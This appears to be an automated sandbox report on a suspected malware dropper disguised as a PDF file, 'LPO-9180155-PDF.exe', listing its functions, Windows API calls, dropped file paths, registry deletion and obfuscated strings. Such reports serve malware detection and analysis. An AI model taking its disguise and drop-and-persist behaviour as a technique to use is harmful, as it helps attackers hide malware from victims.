C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes, xrefs: 00403942, 0040394A, 004039ED, 004039F3, 00403A03
RichEdit20W, xrefs: 00403AFE, 00403B04
1033, xrefs: 004038D2, 0040392E
.DEFAULT\Control Panel\International, xrefs: 0040391E
: Completed, xrefs: 0040397A, 00403983, 00403991, 004039E0, 004039E6
"C:\Users\user\Desktop\LPO-9180155-PDF.exe", xrefs: 004038B5
RichEd32, xrefs: 00403AF1
Control Panel\Desktop\ResourceLocale, xrefs: 004038E6
C:\Users\user\AppData\Local\Temp\, xrefs: 004038BE
_Nb, xrefs: 00403A36, 00403A9E
.exe, xrefs: 004039C0
RichEdit, xrefs: 00403B0D

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\LPO-9180155-PDF.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 914957316-2147029863
Opcode ID: 944dc6c03719ae45e44b3d46cd84eabff06a9ed2df0d9f5219aeaae38ab8ce66
Instruction ID: 7b2c8f7aec5f024c70211f55c02b660a410cf4becd836ab4c66ac285f40ceed6
Opcode Fuzzy Hash: 944dc6c03719ae45e44b3d46cd84eabff06a9ed2df0d9f5219aeaae38ab8ce66
Instruction Fuzzy Hash: 5A61A470644201BAE320AF669C46F3B3A6CEB44749F40457FF941B62E2DB7C6902CA6D

Function 00403C55 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C91
ShowWindow.USER32(?), ref: 00403CAE
DestroyWindow.USER32 ref: 00403CC2
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CDE
GetDlgItem.USER32(?,?), ref: 00403CFF
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D13
IsWindowEnabled.USER32(00000000), ref: 00403D1A
GetDlgItem.USER32(?,00000001), ref: 00403DC8
GetDlgItem.USER32(?,00000002), ref: 00403DD2
SetClassLongW.USER32(?,000000F2,?), ref: 00403DEC
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3D
GetDlgItem.USER32(?,00000003), ref: 00403EE3
ShowWindow.USER32(00000000,?), ref: 00403F04
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F16
EnableWindow.USER32(?,?), ref: 00403F31
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F47
EnableMenuItem.USER32(00000000), ref: 00403F4E
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F66
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F79
lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA2
SetWindowTextW.USER32(?,004226D0), ref: 00403FB6
ShowWindow.USER32(?,0000000A), ref: 004040EA

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 58ab62fde9f499ba62d07c3a6c70f2588c0a9981729e988da1906f3edcdd1a2b
Instruction ID: 4e076ec7db8712f1269b31be3a161a6c229bb752fad246b02f2b6bf34ba01b4a
Opcode Fuzzy Hash: 58ab62fde9f499ba62d07c3a6c70f2588c0a9981729e988da1906f3edcdd1a2b
Instruction Fuzzy Hash: 5BC1D271A04205BBDB206F61ED49E3B3A69FB89745F40053EF601B11F1CB799852DB2E

Function 00402DBA Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402DCE
GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEA

Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A

GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00402E33
GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7A

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403011
N, xrefs: 00403002
C:\Users\user\AppData\Local\Temp\, xrefs: 00402DC7, 00402F92
Error launching installer, xrefs: 00402E0A
C:\Users\user\Desktop, xrefs: 00402E15, 00402E1A, 00402E20
soft, xrefs: 00402EAA
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC3
Inst, xrefs: 00402EA1
"C:\Users\user\Desktop\LPO-9180155-PDF.exe", xrefs: 00402DC3
Null, xrefs: 00402EB3

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\LPO-9180155-PDF.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$N
API String ID: 2803837635-3874629254
Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
Instruction ID: 1f6ec37bde34587697a274125597031aed9c17e441137146a4e3b0792cc80405
Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
Instruction Fuzzy Hash: 3761F431940205ABDB20EF65DD89AAE3BB8AB04355F20417BF600B32D1D7B89E41DB9C

Function 00401752 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 00401793
CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac","C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac",00000000,00000000,"C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac",C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes,?,?,00000031), ref: 004017B8

Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5

Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Strings

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes, xrefs: 00401781
"C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac", xrefs: 00401770, 00401779, 00401786, 00401798, 004017A4, 004017DA, 004017F0, 0040180E, 0040184A, 004018CB, 004018D4, 004018DE, 004018E9
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor, xrefs: 00401818, 00401834

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: "C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac"$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor
API String ID: 1941528284-4085916267
Opcode ID: 684cf647b502b8cea27ec51f3a74b93e11290c925dea9a009321a0283d18598e
Instruction ID: 10c9bfb48ac22d70b7a6fd4bf6847715cc6e5200bae8767ad0241ecc3b8f07ee
Opcode Fuzzy Hash: 684cf647b502b8cea27ec51f3a74b93e11290c925dea9a009321a0283d18598e
Instruction Fuzzy Hash: 6841B172904519BACF10BBB5CC86DAF7679EF05329F20463BF521B11E1D63C8A41CA6E

Function 00405192 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Strings

Completed, xrefs: 004051B3, 004051C3, 004051C9, 004051EC, 004051F8

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Completed
API String ID: 2531174081-3087654605
Opcode ID: 48b19a34b63cb90607c45f1125da49094336e2c299eab4fbc02cedcd7faf0acf
Instruction ID: 4e820289f32981fa80bdc57a8535783694e00142cb9a6ac2a8905b2d060becfb
Opcode Fuzzy Hash: 48b19a34b63cb90607c45f1125da49094336e2c299eab4fbc02cedcd7faf0acf
Instruction Fuzzy Hash: 9D219D31D00518BACB21AF95DD84ADFBFB8EF44350F14807AF904B62A0C7794A41DFA8

Function 0040317B Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403190

Part of subcall function 0040330D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000), ref: 004031C3
WriteFile.KERNELBASE(0040BE78,0040EB45,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?), ref: 0040327D
SetFilePointer.KERNELBASE(0013A9DF,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C), ref: 004032CF

Strings

E@, xrefs: 0040324C, 00403265
N, xrefs: 004031DA
habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 004031F0, 004031F6

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID: E@$habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek$N
API String ID: 2146148272-1738161514
Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
Instruction ID: 37036d35f8974e55ed68100cf34a45723990335e8d7a2adc0945050858e8c70a
Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
Instruction Fuzzy Hash: 7D41CB725042019FDB10DF29ED848A63BACFB54356720827FE910B22E1D7B99D41DBED

Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,?,?,75922EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\LPO-9180155-PDF.exe"), ref: 004059EC
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09

CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes,?,00000000,000000F0), ref: 00401630

Strings

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes, xrefs: 00401623

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes
API String ID: 3751793516-449055245
Opcode ID: 77a50746faaf70f481261059f09a464f58bc4f4b68c75f239c42b854978f3346
Instruction ID: 199c01fa1d361ac50fd0ab4436582695df459e1bfde9dc24052da25e00d2fbae
Opcode Fuzzy Hash: 77a50746faaf70f481261059f09a464f58bc4f4b68c75f239c42b854978f3346
Instruction Fuzzy Hash: D011C271908104EBDB206FA0CD449AF36B0EF15365B64063BF881B62E1D63D49819A6E

Function 0040638E Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 00406398

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID:
String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
API String ID: 0-2559241417
Opcode ID: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
Instruction ID: 37bedb047a1cdcb2186193905b10d92141f0d7a21aac59a3988bc0e8c58e701c
Opcode Fuzzy Hash: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
Instruction Fuzzy Hash: 8A816671E04228DBDF24CFA8C844BADBBB0FF44305F12816AD856BB281C7785A96DF44

Function 00402B78 Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B99
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
RegCloseKey.ADVAPI32(?), ref: 00402BDE
RegCloseKey.ADVAPI32(?), ref: 00402C03
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074067986.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074254505.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_LPO-9180155-PDF.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 5dde48613cb83d0adfaafee1501ae70c9f94bc296712e9edd69c2eafcb4792e1
Instruction ID: 9ec10266fc8442ca9feb2f2c36393197ef7fd7660a084b6a818e704b420db749
Opcode Fuzzy Hash: 5dde48613cb83d0adfaafee1501ae70c9f94bc296712e9edd69c2eafcb4792e1
Instruction Fuzzy Hash: 0D113A7190410CFEEF11AF90DE89EAE3B79EB44348F10057AFA05A10E0D3B59E51AA69

Function 00403060 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000,00409230,?), ref: 00403086
WriteFile.KERNELBASE(00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,?,000000FF,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403113

Strings

habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 004030DC, 004030F3, 0040310F

Memory Dump Source

Source File: 00000000.00000002.2074034235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2074015768.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2074048159.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
